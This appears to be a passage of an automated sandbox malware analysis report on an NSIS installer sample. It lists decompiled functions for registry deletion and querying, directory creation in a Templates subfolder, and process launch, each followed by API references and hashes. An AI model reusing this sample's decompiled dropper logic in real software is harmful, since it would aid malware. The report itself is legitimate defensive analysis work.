                                                      0x00405a33
                                                      0x00405a37
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00405a37
                                                      0x00405a20
                                                      0x00000000

                                                      APIs
                                                        • Part of subcall function 00405F7D: lstrcpynA.KERNEL32(?,?,00000400,004032BB,Doktorgraden Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00405F8A
                                                        • Part of subcall function 004059AE: CharNextA.USER32(?,?,Forgngeliges.rea,?,00405A1A,Forgngeliges.rea,Forgngeliges.rea,75A63410,?,C:\Users\user\AppData\Local\Temp\,00405765,?,75A63410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004059BC
                                                        • Part of subcall function 004059AE: CharNextA.USER32(00000000), ref: 004059C1
                                                        • Part of subcall function 004059AE: CharNextA.USER32(00000000), ref: 004059D5
                                                      • lstrlenA.KERNEL32(Forgngeliges.rea,00000000,Forgngeliges.rea,Forgngeliges.rea,75A63410,?,C:\Users\user\AppData\Local\Temp\,00405765,?,75A63410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A56
                                                      • GetFileAttributesA.KERNELBASE(Forgngeliges.rea,Forgngeliges.rea,Forgngeliges.rea,Forgngeliges.rea,Forgngeliges.rea,Forgngeliges.rea,00000000,Forgngeliges.rea,Forgngeliges.rea,75A63410,?,C:\Users\user\AppData\Local\Temp\,00405765,?,75A63410,C:\Users\user\AppData\Local\Temp\), ref: 00405A66
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                      • String ID: C:\Users\user\AppData\Local\Temp\$Forgngeliges.rea
                                                      • API String ID: 3248276644-2670542743
                                                      • Opcode ID: 59c4d439f8e780665a95aab8c0f078ab1494ed1c34d0f7562e7ab92a144acefd
                                                      • Instruction ID: 99d34a1d2256cfbc911754f26576654ac704e19cee30922b90174233901e1ae6
                                                      • Opcode Fuzzy Hash: 59c4d439f8e780665a95aab8c0f078ab1494ed1c34d0f7562e7ab92a144acefd
                                                      • Instruction Fuzzy Hash: 48F0A431315D5156C622323A1C4AAAF0A48CEC7364749463BF861B12D3DA3C89439D6E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00402BCD Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 84%
                                                      			E00402BCD(void* __eflags, void* _a4, char* _a8, signed int _a12) {
				void* _v8;
				char _v272;
				void* _t19;
				signed int _t25;
				intOrPtr* _t27;
				signed int _t32;
				signed int _t33;
				signed int _t34;

				_t33 = _a12;
				_t34 = _t33 & 0x00000300;
				_t32 = _t33 & 0x00000001;
				_t19 = E00405E03(__eflags, _a4, _a8, _t34 | 0x00000008,  &_v8); // executed
				if(_t19 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						__eflags = _t32;
						if(__eflags != 0) {
							RegCloseKey(_v8);
							return 0x3eb;
						}
						_t25 = E00402BCD(__eflags, _v8,  &_v272, _a12);
						__eflags = _t25;
						if(_t25 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00406315(3);
					if(_t27 == 0) {
						return RegDeleteKeyA(_a4, _a8);
					}
					return  *_t27(_a4, _a8, _t34, 0);
				}
				return _t19;
			}











                                                      0x00402bd8
                                                      0x00402be1
                                                      0x00402bea
                                                      0x00402bf6
                                                      0x00402bfd
                                                      0x00402c21
                                                      0x00402c07
                                                      0x00402c09
                                                      0x00402c5c
                                                      0x00000000
                                                      0x00402c62
                                                      0x00402c18
                                                      0x00402c1d
                                                      0x00402c1f
                                                      0x00000000
                                                      0x00000000
                                                      0x00402c1f
                                                      0x00402c3b
                                                      0x00402c43
                                                      0x00402c4a
                                                      0x00000000
                                                      0x00402c6f
                                                      0x00000000
                                                      0x00402c55
                                                      0x00402c79

                                                      APIs
                                                      • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C32
                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402C3B
                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402C5C
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: Close$Enum
                                                      • String ID:
                                                      • API String ID: 464197530-0
                                                      • Opcode ID: e80e024fca40de8deb0b9c297206eede72932d1e756bb36d88eb62ad8731df9a
                                                      • Instruction ID: c4db57b0a2e4c89af525aedefa8ad358439d5fabd543c2a0248dd752bef9be78
                                                      • Opcode Fuzzy Hash: e80e024fca40de8deb0b9c297206eede72932d1e756bb36d88eb62ad8731df9a
                                                      • Instruction Fuzzy Hash: 16115832504109FBEF129F90CF09F9E7B69AB48390F104032BD45B51E0EBB59E11AAA8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004015BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 87%
                                                      			E004015BB(char __ebx, void* __eflags) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402ACB(0xfffffff0);
				_t13 = E004059AE(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E00405940(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E004055E7(_t28);
						} else {
							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E00405604(_t39) == 0) {
								goto L5;
							} else {
								_t22 = E0040556A(_t28); // executed
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405F7D("C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Heize", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x7a2fe8 =  *0x7a2fe8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}













                                                      0x004015bb
                                                      0x004015c2
                                                      0x004015c5
                                                      0x004015ca
                                                      0x004015ce
                                                      0x004015d0
                                                      0x004015d8
                                                      0x004015da
                                                      0x004015dc
                                                      0x004015e0
                                                      0x004015e3
                                                      0x004015fb
                                                      0x004015fc
                                                      0x004015e5
                                                      0x004015e5
                                                      0x004015e8
                                                      0x00000000
                                                      0x004015f3
                                                      0x004015f4
                                                      0x004015f4
                                                      0x004015e8
                                                      0x00401603
                                                      0x0040160a
                                                      0x00401617
                                                      0x00401617
                                                      0x0040160c
                                                      0x0040160d
                                                      0x00401615
                                                      0x00000000
                                                      0x00000000
                                                      0x00401615
                                                      0x0040160a
                                                      0x0040161a
                                                      0x0040161d
                                                      0x0040161f
                                                      0x00401620
                                                      0x004015d0
                                                      0x00401627
                                                      0x00401652
                                                      0x0040223d
                                                      0x00401629
                                                      0x0040162b
                                                      0x00401636
                                                      0x0040163c
                                                      0x00401644
                                                      0x0040164a
                                                      0x0040164a
                                                      0x00401644
                                                      0x0040295a
                                                      0x00402966

                                                      APIs
                                                        • Part of subcall function 004059AE: CharNextA.USER32(?,?,Forgngeliges.rea,?,00405A1A,Forgngeliges.rea,Forgngeliges.rea,75A63410,?,C:\Users\user\AppData\Local\Temp\,00405765,?,75A63410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004059BC
                                                        • Part of subcall function 004059AE: CharNextA.USER32(00000000), ref: 004059C1
                                                        • Part of subcall function 004059AE: CharNextA.USER32(00000000), ref: 004059D5
                                                      • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                        • Part of subcall function 0040556A: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004055AD
                                                      • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Heize,00000000,00000000,000000F0), ref: 0040163C
                                                      Strings
                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Heize, xrefs: 00401631
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                      • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Heize
                                                      • API String ID: 1892508949-2284297545
                                                      • Opcode ID: 896e4d0df2f5b7ce095f594a292d37cd624813725e5696a67fb6371ddee0b282
                                                      • Instruction ID: e2f0057a106d67730eaa6cdd0667b4b20a1f2aaf6f6dd3ced09863daba4193e1
                                                      • Opcode Fuzzy Hash: 896e4d0df2f5b7ce095f594a292d37cd624813725e5696a67fb6371ddee0b282
                                                      • Instruction Fuzzy Hash: 5C112B31104151EBCF217BB54D418BF66B09E92324B28053FE5D1B22E3D63D4D42963F
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00405E64 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 90%
                                                      			E00405E64(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x400;
				_t21 = E00405E03(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8); // executed
					_t21 = RegCloseKey(_a20); // executed
					_t30[0x3ff] = _t30[0x3ff] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                                                      0x00405e72
                                                      0x00405e74
                                                      0x00405e8c
                                                      0x00405e91
                                                      0x00405e96
                                                      0x00405ed3
                                                      0x00405ed3
                                                      0x00405e98
                                                      0x00405eaa
                                                      0x00405eb5
                                                      0x00405ebb
                                                      0x00405ec5
                                                      0x00000000
                                                      0x00000000
                                                      0x00405ec5
                                                      0x00405ed8

                                                      APIs
                                                      • RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,Call,?,?,?,?,00000002,Call,?,004060A8,80000002), ref: 00405EAA
                                                      • RegCloseKey.KERNELBASE(?,?,004060A8,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll), ref: 00405EB5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: CloseQueryValue
                                                      • String ID: Call
                                                      • API String ID: 3356406503-1824292864
                                                      • Opcode ID: 2ae01f244120d487d9f351ea12627f7621f1ac4d10347c017b688b21594c6fc7
                                                      • Instruction ID: be592471178a3b34147732ee01c8456e78db25e2de640fde20402d2d05791b9a
                                                      • Opcode Fuzzy Hash: 2ae01f244120d487d9f351ea12627f7621f1ac4d10347c017b688b21594c6fc7
                                                      • Instruction Fuzzy Hash: 88015A76500609AADF228F61CD09FDB3BA8EF59364F10442AF955A2190D378DA54CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040561C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0040561C(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x7a0d48->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x7a0d48,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                      0x00405625
                                                      0x00405645
                                                      0x0040564d
                                                      0x00405652
                                                      0x00000000
                                                      0x00405658
                                                      0x0040565c

                                                      APIs
                                                      • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A0D48,Error launching installer), ref: 00405645
                                                      • CloseHandle.KERNEL32(?), ref: 00405652
                                                      Strings
                                                      • Error launching installer, xrefs: 0040562F
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateHandleProcess
                                                      • String ID: Error launching installer
                                                      • API String ID: 3712363035-66219284
                                                      • Opcode ID: 70af5941f3bc690bdcd9881a93690d3303993229d12fc254cd5844f1ea8daab6
                                                      • Instruction ID: bdfa79d73584ee4add39219e15a001359f74b35d93969b7cce68af7ca5274bde
                                                      • Opcode Fuzzy Hash: 70af5941f3bc690bdcd9881a93690d3303993229d12fc254cd5844f1ea8daab6
                                                      • Instruction Fuzzy Hash: 7AE04FF1600209BFEB009FA0DD05F7F77ACEB50744F004821BD14F6150D675A8008A78
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004024E5 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 86%
                                                      			E004024E5(int* __ebx, intOrPtr __edx, char* __esi) {
				void* _t9;
				int _t10;
				long _t13;
				int* _t16;
				intOrPtr _t21;
				void* _t22;
				char* _t24;
				void* _t26;
				void* _t29;

				_t24 = __esi;
				_t21 = __edx;
				_t16 = __ebx;
				_t9 = E00402B0B(_t29, 0x20019); // executed
				_t22 = _t9;
				_t10 = E00402AA9(3);
				 *((intOrPtr*)(_t26 - 0x3c)) = _t21;
				 *__esi = __ebx;
				if(_t22 == __ebx) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
				} else {
					 *(_t26 + 8) = 0x3ff;
					if( *((intOrPtr*)(_t26 - 0x18)) == __ebx) {
						_t13 = RegEnumValueA(_t22, _t10, __esi, _t26 + 8, __ebx, __ebx, __ebx, __ebx); // executed
						__eflags = _t13;
						if(_t13 != 0) {
							 *((intOrPtr*)(_t26 - 4)) = 1;
						}
					} else {
						RegEnumKeyA(_t22, _t10, __esi, 0x3ff); // executed
					}
					_t24[0x3ff] = _t16;
					_push(_t22); // executed
					RegCloseKey(); // executed
				}
				 *0x7a2fe8 =  *0x7a2fe8 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}












                                                      0x004024e5
                                                      0x004024e5
                                                      0x004024e5
                                                      0x004024ea
                                                      0x004024f1
                                                      0x004024f3
                                                      0x004024fb
                                                      0x004024fe
                                                      0x00402500
                                                      0x0040271c
                                                      0x00402506
                                                      0x0040250e
                                                      0x00402511
                                                      0x0040252a
                                                      0x00402530
                                                      0x00402532
                                                      0x00402534
                                                      0x00402534
                                                      0x00402513
                                                      0x00402517
                                                      0x00402517
                                                      0x0040253b
                                                      0x00402541
                                                      0x00402542
                                                      0x00402542
                                                      0x0040295a
                                                      0x00402966

                                                      APIs
                                                      • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402517
                                                      • RegEnumValueA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,00020019), ref: 0040252A
                                                      • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nse224D.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 00402542
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: Enum$CloseValue
                                                      • String ID:
                                                      • API String ID: 397863658-0
                                                      • Opcode ID: 0f199fac73fa034a888c8f233137f05f5704bcb160ec432268ac7fbc93c17938
                                                      • Instruction ID: 518d0c9c0f1d18e9ba130a50ca70a4c0b748d884a109ef79be1f353746569a5a
                                                      • Opcode Fuzzy Hash: 0f199fac73fa034a888c8f233137f05f5704bcb160ec432268ac7fbc93c17938
                                                      • Instruction Fuzzy Hash: 000171B1A04205FFEB159FA99E9CEBF7A7CDF40348F10443EF145A61C0DAB84A459729
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00402473 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 84%
                                                      			E00402473(int* __ebx, char* __esi) {
				void* _t17;
				char* _t18;
				void* _t33;
				void* _t37;
				void* _t40;

				_t35 = __esi;
				_t27 = __ebx;
				_t17 = E00402B0B(_t40, 0x20019); // executed
				_t33 = _t17;
				_t18 = E00402ACB(0x33);
				 *__esi = __ebx;
				if(_t33 == __ebx) {
					 *(_t37 - 4) = 1;
				} else {
					 *(_t37 - 0x3c) = 0x400;
					if(RegQueryValueExA(_t33, _t18, __ebx, _t37 + 8, __esi, _t37 - 0x3c) != 0) {
						L7:
						 *_t35 = _t27;
						 *(_t37 - 4) = 1;
					} else {
						if( *(_t37 + 8) == 4) {
							__eflags =  *(_t37 - 0x18) - __ebx;
							 *(_t37 - 4) = 0 |  *(_t37 - 0x18) == __ebx;
							E00405EDB(__esi,  *__esi);
						} else {
							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
								 *(_t37 - 4) =  *(_t37 - 0x18);
								_t35[0x3ff] = _t27;
							} else {
								goto L7;
							}
						}
					}
					_push(_t33); // executed
					RegCloseKey(); // executed
				}
				 *0x7a2fe8 =  *0x7a2fe8 +  *(_t37 - 4);
				return 0;
			}








                                                      0x00402473
                                                      0x00402473
                                                      0x00402478
                                                      0x0040247f
                                                      0x00402481
                                                      0x00402488
                                                      0x0040248a
                                                      0x0040271c
                                                      0x00402490
                                                      0x00402493
                                                      0x004024ae
                                                      0x004024de
                                                      0x004024de
                                                      0x004024e0
                                                      0x004024b0
                                                      0x004024b4
                                                      0x004024cd
                                                      0x004024d4
                                                      0x004024d7
                                                      0x004024b6
                                                      0x004024b9
                                                      0x004024c4
                                                      0x0040253b
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004024b9
                                                      0x004024b4
                                                      0x00402541
                                                      0x00402542
                                                      0x00402542
                                                      0x0040295a
                                                      0x00402966

                                                      APIs
                                                      • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024A3
                                                      • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nse224D.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 00402542
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
